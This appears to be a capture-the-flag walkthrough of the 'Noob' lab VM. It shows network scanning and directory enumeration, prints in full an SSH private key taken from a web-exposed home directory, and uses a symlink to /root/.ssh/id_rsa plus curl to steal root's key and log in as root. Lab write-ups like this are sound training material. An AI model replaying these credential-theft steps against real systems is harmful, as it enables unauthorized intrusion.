-- Noob Writeup --


1) IP Scaning / Locating

arp-scan -l |grep "PCS"
10.0.2.19	08:00:27:03:ec:a7	PCS Systemtechnik GmbH


2) Nmap 

nmap -n -sS -p- --open --min-rate=5000 10.0.2.19
Starting Nmap 7.91 ( https://nmap.org ) at 2022-06-20 15:23 EDT
Nmap scan report for 10.0.2.19
Host is up (0.000061s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
65530/tcp open  unknown
MAC Address: 08:00:27:03:EC:A7 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.48 seconds


3) Gobuster

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.19:65530 -x txt,php,html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.0.2.19:65530
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              txt,php,html
[+] Timeout:                 10s
===============================================================
2022/06/20 15:24:51 Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 19]
/http%3A%2F%2Fwww     (Status: 301) [Size: 45] [--> /http:/www]
/http%3A%2F%2Fwww.txt (Status: 301) [Size: 49] [--> /http:/www.txt]
/http%3A%2F%2Fwww.php (Status: 301) [Size: 49] [--> /http:/www.php]
/http%3A%2F%2Fwww.html (Status: 301) [Size: 50] [--> /http:/www.html]
/http%3A%2F%2Fyoutube (Status: 301) [Size: 49] [--> /http:/youtube]  
/http%3A%2F%2Fyoutube.txt (Status: 301) [Size: 53] [--> /http:/youtube.txt]
/http%3A%2F%2Fyoutube.php (Status: 301) [Size: 53] [--> /http:/youtube.php]
/http%3A%2F%2Fyoutube.html (Status: 301) [Size: 54] [--> /http:/youtube.html]
/http%3A%2F%2Fblogs   (Status: 301) [Size: 47] [--> /http:/blogs]            
/http%3A%2F%2Fblogs.html (Status: 301) [Size: 52] [--> /http:/blogs.html]    
/http%3A%2F%2Fblogs.txt (Status: 301) [Size: 51] [--> /http:/blogs.txt]      
/http%3A%2F%2Fblogs.php (Status: 301) [Size: 51] [--> /http:/blogs.php]      
/http%3A%2F%2Fblog    (Status: 301) [Size: 46] [--> /http:/blog]             
/http%3A%2F%2Fblog.html (Status: 301) [Size: 51] [--> /http:/blog.html]      
/http%3A%2F%2Fblog.txt (Status: 301) [Size: 50] [--> /http:/blog.txt]        
/http%3A%2F%2Fblog.php (Status: 301) [Size: 50] [--> /http:/blog.php]        
/**http%3A%2F%2Fwww   (Status: 301) [Size: 51] [--> /%2A%2Ahttp:/www]        
/**http%3A%2F%2Fwww.txt (Status: 301) [Size: 55] [--> /%2A%2Ahttp:/www.txt]  
/**http%3A%2F%2Fwww.php (Status: 301) [Size: 55] [--> /%2A%2Ahttp:/www.php]  
/**http%3A%2F%2Fwww.html (Status: 301) [Size: 56] [--> /%2A%2Ahttp:/www.html]
/http%3A%2F%2Fcommunity (Status: 301) [Size: 51] [--> /http:/community]      
/http%3A%2F%2Fcommunity.txt (Status: 301) [Size: 55] [--> /http:/community.txt]
/http%3A%2F%2Fcommunity.php (Status: 301) [Size: 55] [--> /http:/community.php]
/http%3A%2F%2Fcommunity.html (Status: 301) [Size: 56] [--> /http:/community.html]
/http%3A%2F%2Fradar.php (Status: 301) [Size: 51] [--> /http:/radar.php]          
/http%3A%2F%2Fradar.html (Status: 301) [Size: 52] [--> /http:/radar.html]        
/http%3A%2F%2Fradar   (Status: 301) [Size: 47] [--> /http:/radar]                
/http%3A%2F%2Fradar.txt (Status: 301) [Size: 51] [--> /http:/radar.txt]          
/http%3A%2F%2Fjeremiahgrossman (Status: 301) [Size: 58] [--> /http:/jeremiahgrossman]
/http%3A%2F%2Fjeremiahgrossman.html (Status: 301) [Size: 63] [--> /http:/jeremiahgrossman.html]
/http%3A%2F%2Fjeremiahgrossman.txt (Status: 301) [Size: 62] [--> /http:/jeremiahgrossman.txt]  
/http%3A%2F%2Fjeremiahgrossman.php (Status: 301) [Size: 62] [--> /http:/jeremiahgrossman.php]  
/http%3A%2F%2Fweblog  (Status: 301) [Size: 48] [--> /http:/weblog]                             
/http%3A%2F%2Fweblog.txt (Status: 301) [Size: 52] [--> /http:/weblog.txt]                      
/http%3A%2F%2Fweblog.php (Status: 301) [Size: 52] [--> /http:/weblog.php]                      
/http%3A%2F%2Fweblog.html (Status: 301) [Size: 53] [--> /http:/weblog.html]                    
/http%3A%2F%2Fswik.txt (Status: 301) [Size: 50] [--> /http:/swik.txt]                          
/http%3A%2F%2Fswik.php (Status: 301) [Size: 50] [--> /http:/swik.php]                          
/http%3A%2F%2Fswik.html (Status: 301) [Size: 51] [--> /http:/swik.html]                        
/http%3A%2F%2Fswik    (Status: 301) [Size: 46] [--> /http:/swik]                               
/nt4share             (Status: 301) [Size: 45] [--> /nt4share/]                                
                                                                                               
===============================================================
2022/06/20 15:25:41 Finished
===============================================================

Port 65530 is an web server and if we check the directories we can see the /nets4are
later that if we visit http://10.0.2.19:65530/nt4share we can see
.Xauthority
.bash_logout
.bashrc
.profile
.ssh/

check all files in .ssh/ we found an user inside authorized_keys (adela)

visiting http://10.0.2.19:65530/nt4share/.ssh/id_rsa we obtain id_rsa 

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAvGXqXURDOKLvimFw7BT0/Wc0BRenW0lri6TehxUjTKw3FgUb2adL
ACCvDSDCmJkFzqlk6IhC7gQZMGHj2Ea5zIgD0OG47YKA8N4mUiQK1ADTeJpJAut4dyjXvM
SdNhw9ORWqr1QcFBv9RoG9Itj8tgALOCe2yEyKSDmAs2fPGXNdLpyzSlV5BNtOxO3wB98E
Wv0PwzgOjIIe7RYTpSofdBV/Niqf6t8iS8h9YGpec9AReP9N/c0dsLhS01Ay9ZGQiJsxLh
9NS7OGhbsMARNYk0de8gWNM9hiw4Ta7cjhRgn8pR0xgOii4H7oNcj9pIWE7JM862T7p6te
tCJWqF7zWQAAA8h4t/eOeLf3jgAAAAdzc2gtcnNhAAABAQC8ZepdREM4ou+KYXDsFPT9Zz
QFF6dbSWuLpN6HFSNMrDcWBRvZp0sAIK8NIMKYmQXOqWToiELuBBkwYePYRrnMiAPQ4bjt
goDw3iZSJArUANN4mkkC63h3KNe8xJ02HD05FaqvVBwUG/1Ggb0i2Py2AAs4J7bITIpIOY
CzZ88Zc10unLNKVXkE207E7fAH3wRa/Q/DOA6Mgh7tFhOlKh90FX82Kp/q3yJLyH1gal5z
0BF4/039zR2wuFLTUDL1kZCImzEuH01Ls4aFuwwBE1iTR17yBY0z2GLDhNrtyOFGCfylHT
GA6KLgfug1yP2khYTskzzrZPunq160IlaoXvNZAAAAAwEAAQAAAQEAhYdujuA9DL1fLiNW
F93armghVKKpOWhWU0ltdyyiMku1V2QTkzahT9vadmGLywBaP1mMbct2NKCvAb2/8aBfO/
oDSl9R5PUkUpQBcSKekhhrygUATpN6dGp8TgzEqH9nXThgG5hvtkkIQJrf5P0KUCzDxu9O
+7RUJlCrSX0AKjaCvN50kicRGts/uFYekJzetgIdtlQbeoK0BTgJxpDQ0xYFOODeRnzI92
GQ+uTa8zdNbggFvgDNPDl9W1mX73uHxXttdoTj9mS/yA1KBlXmP9VIi+73xlhWbk5Iy+Xi
jWbjwq12J9xnApUXu496u/5yP55xlspn7cGV9aoO7aOhKQAAAIEAkvk/7XY0xTfnyTDsg6
6/gGiJik0oyhmx0ZlxrWGdqtiWgwjhq6Q4WMaJUU8AhBrm7lKCs7ykYt9oyBpJZ4TnHn+Q
gl0O8Wu/fhEZcj2+d7aKlWVDtUxWtAZZRDXGtfZkVTmJ5prQXFL2bMIyVsMB1M7dHTD3wk
p4nFFhoCZ2CO0AAACBAPXq+8D1p3MApxtMDJ40trMTQ3HLWLXlVTuideUj5FnHDwF73gza
p3h6LXxH+yIHw/xzg0rKoV2ikfqQBU3wqunpLw5udzPLHm+PyTHH3WsjcieB99sFAvWc9g
ni/otpQQqRgB0I3rGMqiBCKyvb1sXF12SQ0lC4N7T5hRm9/m9PAAAAgQDEHzyLduguz77R
c1CLNFjPRlTnsi1xSP9Iz2SFl1vMd2J77RRrQNURtLZZcGgmO7CL/fhTobau7neBq4+oVX
Izf0B4UUNnzL6iB0yn/tt+rBLw6ItVUj+rQmtI3i2aPVXDle1Xi5Fckm2QS343ThUq2lI9
7mtNUcmCNL6cczsI1wAAAAphZGVsYUBub29iAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----


3) Entering the Machine and Exploitation

We take id_rsa and gived permission and used it to the machine as user we found erlier

chmod 400 id_rsa

ssh -i id_rsa adela@10.0.2.19  
The authenticity of host '10.0.2.19 (10.0.2.19)' can't be established.
ECDSA key fingerprint is SHA256:7gfzIWTiQzde+mFnh7J6F18Oweea64a5cOLn8HdbUG0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.2.19' (ECDSA) to the list of known hosts.
Linux noob 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jul 14 02:50:51 2021 from 192.168.1.51
adela@noob:~$ whoami; id; hostname
adela
uid=1000(adela) gid=1000(adela) groups=1000(adela),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
noob

4) Exploitation

adela@noob:~$ ln -s /root/.ssh/id_rsa /home/adele
ln: failed to create symbolic link '/home/adele': Permission denied
adela@noob:~$ ln -s /root/.ssh/id_rsa /home/adela
adela@noob:~$ ls -la
total 28
drwxr-xr-x 3 adela adela 4096 Jun 20 15:47 .
drwxr-xr-x 3 root  root  4096 Jul 11  2021 ..
-rw-r--r-- 1 adela adela  220 Jul 11  2021 .bash_logout
-rw-r--r-- 1 adela adela 3526 Jul 11  2021 .bashrc
lrwxrwxrwx 1 adela adela   17 Jun 20 15:47 id_rsa -> /root/.ssh/id_rsa
-rw-r--r-- 1 adela adela  807 Jul 11  2021 .profile
drwx------ 2 adela adela 4096 Jul 13  2021 .ssh
-rw------- 1 adela adela   50 Jul 14  2021 .Xauthority

--> lrwxrwxrwx 1 adela adela   17 Jun 20 15:47 id_rsa -> /root/.ssh/id_rsa


We found the id_rsa for root and head back to http://10.0.2.19:65530/nt4share/id_rsa and  downloaded the id_rsa key and give the corret permission
and connected the machine as a root 

curl -s http://10.0.2.19:65530/nt4share/id_rsa > root_key

chmod 400 root_key  

ssh -i root_key root@10.0.2.19 
Linux noob 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jul 14 02:50:11 2021
root@noob:~# whoami; id; hostname
root
uid=0(root) gid=0(root) groups=0(root)
noob
root@noob:~# ls -la
total 36
drwx------  4 root root 4096 Jul 13  2021 .
drwxr-xr-x 18 root root 4096 Jul 11  2021 ..
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4096 Jul 13  2021 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root   25 Jul 13  2021 root.txt
-rw-r--r--  1 root root   66 Jul 13  2021 .selected_editor
drwx------  2 root root 4096 Jul 13  2021 .ssh
-rw-------  1 root root   25 Jul 13  2021 user.txt

5) Flags

root@noob:~# cat user.txt
*************************
root@noob:~# cat root.txt
*************************

